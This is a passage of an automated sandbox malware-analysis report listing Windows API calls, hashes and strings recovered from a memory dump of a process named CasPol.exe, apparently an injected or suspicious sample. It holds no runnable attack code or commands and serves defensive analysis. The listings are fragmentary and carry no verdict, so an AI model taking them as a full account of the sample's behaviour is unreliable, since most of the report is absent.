                                                                                                                                                                                    • Opcode Fuzzy Hash: d90d9ac40998c7a3314b3e96da16ed6310d1c669f25a0de425d8610d706a6174
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3311FAB5A00208AFDB10DFA9D9889EEB7F8FB49314F10446AF905E7200D739DB45CB64
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00410FE1
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00000000,?), ref: 00411046
                                                                                                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041100C
                                                                                                                                                                                    • wcscat.MSVCRT ref: 0041101F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_snwprintf$LoadMessageSendStringmemcpywcscatwcscpywcslen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 822687973-0
                                                                                                                                                                                    • Opcode ID: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                    • Instruction ID: a8ddfa12325215ca31dcaa8c3ea10779747deab4b932dc2622e692dd88e5739d
                                                                                                                                                                                    • Opcode Fuzzy Hash: 31feba04f8ec477b70d9d9ccd2954727a7d962f108a96a42e882c3f5707c4d5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC0184B59003056AF730E765DC86FAB73ACAB44708F04047AB319F6183DA79A9454A6D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                    • malloc.MSVCRT ref: 00417459
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                                                                                                                                                                                    • free.MSVCRT ref: 0041747F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11289aaf4270ed2c5fe81a5d6e150162e8e95aba20a128aae83a55a74a659502
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                                                                                                                                                                                    • RegisterClassW.USER32(?), ref: 00412428
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule$ClassCreateRegisterWindow
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2678498856-0
                                                                                                                                                                                    • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                                                                                                                                                                                    • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00409B40
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00409B58
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00409B6E
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00409B91
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Item
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3888421826-0
                                                                                                                                                                                    • Opcode ID: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction ID: c5475329a145d4377f6ebcab718370c73cf4573fffc80ea9acc016878d8bcf0e
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb9c6f71d59db109bdd11c185378715e2458b2dfdf7aafdda88e0268854c6760
                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F01D75A0010CBFEB019F959CC1CAF7BBDFB497A4B204475F504E2150D274AE41AA64
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00417B7B
                                                                                                                                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 00417B9B
                                                                                                                                                                                    • LockFileEx.KERNEL32(?,00000001,00000000,?,00000000,?), ref: 00417BA7
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00417BB5
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: File$ErrorLastLockUnlockmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3727323765-0
                                                                                                                                                                                    • Opcode ID: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                    • Instruction ID: 0282759007fe27108f915f617c318df1b7667033481b7feabffed058191037b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dd354450774e38097dcb59a2dc1954613c626237ffe04feccb939eb681cbc84
                                                                                                                                                                                    • Instruction Fuzzy Hash: A801F971108208BFDB219FA5DC84D9B77B8FB40308F20483AF51395050D730A944CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F673
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F6A2
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040F6E2
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040F70D
                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00402FD7
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00402FF4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00403006
                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403017
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2754987064-0
                                                                                                                                                                                    • Opcode ID: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                    • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                                                                                                                                    • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                                                                                                                                    • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                                                                                                                                      • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                                                                                                                                      • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                                                                                                                                    • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                                                                                                                                    • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 764393265-0
                                                                                                                                                                                    • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                                                                                                                                    • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                                                                                                                                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Time$System$File$LocalSpecific
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 979780441-0
                                                                                                                                                                                    • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                                                                                                                                    • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
APIs
• memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
• memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
• GetModuleHandleW.KERNEL32(00000000), ref: 00413505
• DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$DialogHandleModuleParam
• String ID:
• API String ID: 1386444988-0
APIs
• SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
• InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: InvalidateMessageRectSend
• String ID: d=E
• API String ID: 909852535-3703654223
APIs
• wcschr.MSVCRT ref: 0040F79E
• wcschr.MSVCRT ref: 0040F7AC
  • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
  • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: wcschr$memcpywcslen
• String ID: "
• API String ID: 1983396471-123907689
APIs
  • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
• _memicmp.MSVCRT ref: 0040C00D
• memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: FilePointer_memicmpmemcpy
• String ID: URL
• API String ID: 2108176848-3574463123
APIs
• _snwprintf.MSVCRT ref: 0040A398
• memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintfmemcpy
• String ID: %2.2X
• API String ID: 2789212964-323797159
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
APIs
• memset.MSVCRT ref: 0040E770
• SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: MessageSendmemset
• String ID: F^@
• API String ID: 568519121-3652327722
APIs
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
APIs
• ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
• DeleteObject.GDI32(00000000), ref: 004125E7
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??3@DeleteObject
• String ID: r!A
• API String ID: 1103273653-628097481
APIs
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
• wcsrchr.MSVCRT ref: 0040DCE9
• wcscat.MSVCRT ref: 0040DCFF
Strings
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
APIs
• memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
• memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
• memset.MSVCRT ref: 0042BAAE
• memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcpy$memset
• String ID:
APIs
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ??2@$memset
• String ID:
APIs
• wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040A908
• free.MSVCRT ref: 0040A92B
• memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
APIs
• wcslen.MSVCRT ref: 0040B1DE
• free.MSVCRT ref: 0040B201
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B224
• memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$memcpy$mallocwcslen
• String ID:
APIs
• memcmp.MSVCRT ref: 00408AF3
  • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
  • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
  • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
• memcmp.MSVCRT ref: 00408B2B
• memcmp.MSVCRT ref: 00408B5C
• memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: memcmp$memcpy
• String ID:
APIs
• strlen.MSVCRT ref: 0040B0D8
• free.MSVCRT ref: 0040B0FB
  • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
  • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
  • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
• free.MSVCRT ref: 0040B12C
• memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: free$memcpy$mallocstrlen
• String ID:
APIs
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
• malloc.MSVCRT ref: 00417407
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
• free.MSVCRT ref: 00417425
Memory Dump Source
• Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
Similarity
• API ID: ByteCharMultiWide$freemalloc
• String ID:
                                                                                                                                                                                    • API String ID: 2605342592-0
                                                                                                                                                                                    • Opcode ID: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d709113fcafe1a04d94ccb325df1834664bd2c227d6907f8f745ae81c56706a
                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001D.00000002.547995628.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_29_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: wcslen$wcscat$wcscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1961120804-0
                                                                                                                                                                                    • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                    • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                                                                                                                                    • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 23%
Signature Coverage: 0.5%
Total number of Nodes: 967
Total number of Limit Nodes: 16
